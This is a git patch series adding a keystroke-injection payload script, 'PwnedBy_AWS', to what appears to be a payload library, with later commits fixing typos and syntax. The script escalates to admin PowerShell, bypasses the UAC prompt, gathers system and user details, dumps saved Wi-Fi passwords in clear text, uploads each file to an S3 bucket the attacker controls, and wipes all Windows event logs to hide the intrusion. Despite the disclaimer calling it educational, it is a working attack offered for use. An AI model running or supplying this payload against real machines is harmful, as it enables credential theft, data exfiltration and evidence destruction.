From 1fa5da87dd694c00be2d92461f67900c385928fb Mon Sep 17 00:00:00 2001
From: PacManPwn <authokey@proton.me>
Date: Sun, 27 Oct 2024 13:28:46 -0400
Subject: [PATCH 1/5] Create PwnedBy_AWS

Educational and penetration testing purposes only. This script is designed to demonstrate that once physical access is gained, a malicious actor can easily enumerate information and credentials, and have that remotely exfiltrated for later review, exploitation, and/or selling. Please use responsibly, and ensure you are only targeting systems that you have explicit permission to test on.
---
 payloads/library/exfiltration/PwnedBy_AWS | 151 ++++++++++++++++++++++
 1 file changed, 151 insertions(+)
 create mode 100644 payloads/library/exfiltration/PwnedBy_AWS

diff --git a/payloads/library/exfiltration/PwnedBy_AWS b/payloads/library/exfiltration/PwnedBy_AWS
new file mode 100644
index 00000000..8b440706
--- /dev/null
+++ b/payloads/library/exfiltration/PwnedBy_AWS
@@ -0,0 +1,151 @@
+REM Title: Pwned by AWS
+REM Description: System enum and extract to your Amazon Server.
+REM Author: PacManPwn\
+REM Target: Windows 11/10
+
+DELAY 1000
+REM Open the run dialog
+GUI r
+DELAY 500
+
+REM Launch Admin Powershell
+STRING pwsh 
+DELAY 500
+CTRL-SHIFT ENTER
+DELAY 2000
+
+REM Approve User Access Control
+ALT y
+DELAY 2000
+
+REM Install AWS CLI in silent mode (no set-up prompts)
+STRING msiexec.exe /i https://awscli.amazonaws.com/AWSCLIV2.msi /quiet /norestart
+DELAY 500
+ENTER
+
+REM Added extra delay to ensure AWS CLI installation is complete
+DELAY 1500 
+
+REM Verify the AWS CLI is available. If not, exit the script.
+STRING if (!(Get-Command aws -ErrorAction SilentlyContinue)) { Write-Output "AWS CLI not found. Exiting."; exit }
+ENTER
+
+REM Match timezone to your AWS default region
+STRING Set-TimeZone -Id "MATCH-TIMEZONE-TO-AWS-BUCKET"
+ENTER
+
+REM Sync to a reliable NTP server for accurate system time
+STRING w32tm /config /manualpeerlist:"pool.ntp.org" /syncfromflags:manual /reliable:YES /update
+ENTER
+DELAY 500
+
+REM Verify your machine's system time is in sync
+STRING w32tm /resync
+ENTER
+DELAY 1000
+
+REM Set AWS CLI Path to the current session (if it's not recognized)
+STRING $env:Path += ";C:\Program Files\Amazon\AWSCLIV2"
+ENTER
+DELAY 1000
+
+REM Set AWS_ACCESS_KEY_ID
+STRING $env:AWS_ACCESS_KEY_ID = "YOUR-ACCESS-KEY-HERE"
+ENTER
+DELAY 500
+
+REM Set AWS SECRET-ACCESS-KEY-HERE
+STRING $env:AWS_SECRET_ACCESS_KEY = "YOUR-SECRET-ACCESS-KEY-HERE"
+ENTER
+DELAY 500
+
+REM Set your AWS default region (i.e. us-east-1)
+STRING $env:AWS_DEFAULT_REGION = "AWS-BUCKET-REGION"
+ENTER
+DELAY 500
+
+REM Create C:\temp\ directory if it doesn't exist for saving collected info
+STRING If (!(Test-Path -Path "C:\temp\")) { New-Item -Path "C:\temp\" -ItemType Directory }
+ENTER
+DELAY 500
+
+REM Enumerate system info and save to a text file
+STRING systeminfo > C:\temp\systeminfo.txt
+ENTER
+DELAY 1000
+
+REM Upload system info to AWS S3 server
+STRING aws s3 cp C:\temp\systeminfo.txt s3://your-aws-bucket-name/systeminfo.txt
+ENTER
+
+REM Enumerate network interfaces and save to a text file
+STRING Get-NetAdapter > C:\temp\netadapter.txt
+ENTER
+DELAY 1000
+
+REM Upload network adapter info to AWS S3 server
+STRING aws s3 cp C:\temp\netadapter.txt s3://your-aws-bucket-name/netadapter.txt
+ENTER
+
+REM Enumerate user info and save to a text file
+STRING whoami > C:\temp\whoami.txt
+ENTER
+DELAY 1000
+
+REM Upload whoami to AWS S3 server
+STRING aws s3 cp C:\temp\whoami.txt s3://your-aws-bucket-name/whoami.txt
+ENTER
+
+REM Enumerate netuser and save to a text file
+STRING net user > C:\temp\netuser.txt
+ENTER
+DELAY 1000
+
+REM Upload user info to AWS S3 server
+STRING aws s3 cp C:\temp\netuser.txt s3://your-aws-bucket-name/netuser.txt
+ENTER
+
+REM Get Operating System details and save to a text file
+STRING Get-WmiObject Win32_OperatingSystem | Select-Object -Property 
+Caption,OSArchitecture,Version > C:\temp\osinfo.txt
+ENTER
+DELAY 1000
+
+REM Upload OS info to AWS S3 server
+STRING aws s3 cp C:\temp\osinfo.txt s3://your-aws-bucket-name/osinfo.txt
+ENTER
+
+REM Enumerate Wi-Fi profiles and save names to a text file in the temp directory
+STRING netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object 
+{ $_.ToString().Split(':')[1].Trim() } > C:\temp\wifi_names.txt
+ENTER
+DELAY 1000
+
+REM Upload Wi-Fi names to AWS S3 server
+STRING aws s3 cp C:\temp\wifi_names.txt s3://your-aws-bucket-name/wifi_names.txt
+ENTER
+
+REM Retrieve passwords for each Wi-Fi profile and save to a text file
+STRING netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $profileName = 
+$_.ToString().Split(':')[1].Trim(); netsh wlan show profile name="$profileName" key=clear | SelectString 'Key Content' } > C:\temp\wifi_passwords.txt
+ENTER
+DELAY 1000
+
+REM Upload Wi-Fi passwords to AWS S3 server
+STRING aws s3 cp C:\temp\wifi_passwords.txt s3://your-aws-bucket-name/wifi_passwords.txt
+ENTER
+
+REM Delete event logs to clean your tracks
+STRING Get-EventLog -LogName * | ForEach-Object { Clear-EventLog -LogName $_.Log }
+ENTER
+DELAY 2000
+
+REM Exit and close the powershell
+STRING exit
+ENTER
+
+
+REM Lines 63, 58, 63 - Be sure to replace 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'AWS_DEFAULT_REGION', with your appropriate AWS credentials.
+REM Line 34 - Replace Timezone ID to match the timezone for your AWS Region
+REM Adjust directory/file names as you wish
+REM Delays are set for test purposes. Adjust the delays as you would like to optimize the script

From ebe93c90ae93dac578329a8366b517805193ad9c Mon Sep 17 00:00:00 2001
From: PacManPwn <authokey@proton.me>
Date: Sun, 27 Oct 2024 15:07:15 -0400
Subject: [PATCH 2/5] Updated typo in PwnedBy_AWS

---
 payloads/library/exfiltration/PwnedBy_AWS | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/exfiltration/PwnedBy_AWS b/payloads/library/exfiltration/PwnedBy_AWS
index 8b440706..1081b119 100644
--- a/payloads/library/exfiltration/PwnedBy_AWS
+++ b/payloads/library/exfiltration/PwnedBy_AWS
@@ -145,7 +145,7 @@ STRING exit
 ENTER
 
 
-REM Lines 63, 58, 63 - Be sure to replace 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'AWS_DEFAULT_REGION', with your appropriate AWS credentials.
+REM Lines 53, 58, 63 - Be sure to replace 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'AWS_DEFAULT_REGION', with your appropriate AWS credentials.
 REM Line 34 - Replace Timezone ID to match the timezone for your AWS Region
 REM Adjust directory/file names as you wish
 REM Delays are set for test purposes. Adjust the delays as you would like to optimize the script

From e7961c6677640284c0ef5c5ae5b5abb8ec1df054 Mon Sep 17 00:00:00 2001
From: crackingsh3llz <authokey@proton.me>
Date: Tue, 29 Oct 2024 18:37:14 -0400
Subject: [PATCH 3/5] Update PwnedBy_AWS

---
 payloads/library/exfiltration/PwnedBy_AWS | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/exfiltration/PwnedBy_AWS b/payloads/library/exfiltration/PwnedBy_AWS
index 1081b119..f5745991 100644
--- a/payloads/library/exfiltration/PwnedBy_AWS
+++ b/payloads/library/exfiltration/PwnedBy_AWS
@@ -1,6 +1,6 @@
 REM Title: Pwned by AWS
 REM Description: System enum and extract to your Amazon Server.
-REM Author: PacManPwn\
+REM Author: crackingsh3llz\
 REM Target: Windows 11/10
 
 DELAY 1000

From ca80a741fb9c87feca0c289e5f932044795a684d Mon Sep 17 00:00:00 2001
From: crackingsh3llz <authokey@proton.me>
Date: Wed, 30 Oct 2024 09:30:10 -0400
Subject: [PATCH 4/5] Update PwnedBy_AWS

Syntax correction
---
 payloads/library/exfiltration/PwnedBy_AWS | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/exfiltration/PwnedBy_AWS b/payloads/library/exfiltration/PwnedBy_AWS
index f5745991..625f6977 100644
--- a/payloads/library/exfiltration/PwnedBy_AWS
+++ b/payloads/library/exfiltration/PwnedBy_AWS
@@ -127,7 +127,7 @@ ENTER
 
 REM Retrieve passwords for each Wi-Fi profile and save to a text file
 STRING netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $profileName = 
-$_.ToString().Split(':')[1].Trim(); netsh wlan show profile name="$profileName" key=clear | SelectString 'Key Content' } > C:\temp\wifi_passwords.txt
+$_.ToString().Split(':')[1].Trim(); netsh wlan show profile name="$profileName" key=clear | Select-String 'Key Content' } > C:\temp\wifi_passwords.txt
 ENTER
 DELAY 1000
 

From 70d676d3af813c3ab9caee7eb9cb7d10fc09d8a0 Mon Sep 17 00:00:00 2001
From: crackingsh3llz <authokey@proton.me>
Date: Wed, 30 Oct 2024 21:33:49 -0700
Subject: [PATCH 5/5] Update PwnedBy_AWS

---
 payloads/library/exfiltration/PwnedBy_AWS | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/exfiltration/PwnedBy_AWS b/payloads/library/exfiltration/PwnedBy_AWS
index 625f6977..3f51db69 100644
--- a/payloads/library/exfiltration/PwnedBy_AWS
+++ b/payloads/library/exfiltration/PwnedBy_AWS
@@ -9,7 +9,7 @@ GUI r
 DELAY 500
 
 REM Launch Admin Powershell
-STRING pwsh 
+STRING powershell 
 DELAY 500
 CTRL-SHIFT ENTER
 DELAY 2000